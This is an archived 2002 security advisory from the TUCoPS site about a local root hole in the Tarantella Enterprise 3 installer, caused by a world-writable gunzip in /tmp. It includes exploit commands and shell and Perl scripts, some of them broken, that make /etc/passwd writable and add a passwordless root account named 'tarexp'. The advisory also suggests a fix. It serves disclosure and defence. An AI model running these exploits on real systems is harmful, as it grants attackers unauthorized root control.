Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Linux :: Apps N-Z :: lnx5035.htm

Tarantella local root compromise at installation time via bad tmp practice
28th Jan 2002 [SBWID-5035]

	Tarantella local root  compromise  at  installation  time  via  bad  tmp


	 Tarantella 3


	\"Larry  W.  Cashdollar\"  in  \"Vapid  Labs\"   []
	advisory says :

	The  installation  script  provided  with  tarentella  handles   utility
	packages during installation insecurely. A root owned binary  \"gunzip\"
	is created  in  /tmp  with  world  writeable  permissions,  the  pid  is
	appended to the filename.




	$ ls -l /tmp/gunzip16152

	- -rwxrwxrwx    1 root     root        51808 Jan 14 00:15 gunzip16152


	gunzip is extracted:

			    extract gunzip > \"$TMP_GUNZIP\" 2>>$SHXLOGFILE

			    extract gunzip | uncompress > \"$TMP_GUNZIP\" 2>>$SHXLOGFILE


	The permissions of gunzip are changed to rwx for all:

		    chmod 777 $TMP_GUNZIP >/dev/null 2>&1

	The binary is used during installation:

		    extract $efilename | $TMP_GUNZIP -q > \"$efilename\"






	There is a race condition between when  gunzip  is  extracted  and  used
	during installation. At which time a malicious local user  could  inject
	code to compromise the system quickly.

	$ echo \"#!/bin/sh\" > /tmp/

	$ echo \"chmod 777 /etc/passwd\" >> /tmp/


	$ cat /tmp/ > /tmp/gunzip16152


	I  was  able  to  change  the  permissions  of  /etc/passwd  to  777  by
	performing the above as an unpriviledged user.

	In a script :



	#Larry W. Cashdollar


	#Tarantella Enterprise 3 symlink local root Installation exploit

	#For educational purposes only.

	#tested on Linux.  run and wait.



	echo \"Creating symlink.\"


	/bin/ln -s /etc/passwd /tmp/spinning


	echo \"Waiting for tarantella installation.\"


	while true


	echo -n .

	if [ -w /etc/passwd ]


		echo \"tarexp::0:0:Tarantella Exploit:/:/bin/bash\" >> /etc/passwd

	        su - tarexp








	#!/usr/bin/perl -w

	#Another Exploit for tarantella enterprise 3 installation.

	#Larry Cashdollar 2/08/2002

	#Exploits gunzip$$ binary being created in /tmp with perm 777


	#Experimental ext3 kernel mods for preventing/researching race conditions.



	use strict;


	`cat  <<  -EOF- >


	chmod 777 /etc/passwd

	echo \"tarexp::0:0:Tarantella Exploit:/:/bin/bash\" >> /etc/passwd



	my $OUT = \'\';


	while(!$OUT) {

		$OUT =  `ps -ax |grep gunzip |grep -v grep`;

	        print \"Found $OUT\\n\";



	my @args  = split(\' \',$OUT);

	# Do this with one copy operation. This will break installation of tarantella.

	# should test for -w on /etc/passwd stop and su - tarexp.

	while(1) {

	`cp $args[4]`;




	Perhaps create a directory in /tmp or /var/tmp and  use  that  directory
	as a work place?

	umask 077

	mkdir /tmp/workdir



	 Update (05 April 2002)



	Tarantella addressed these issues in a security bulletin:


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH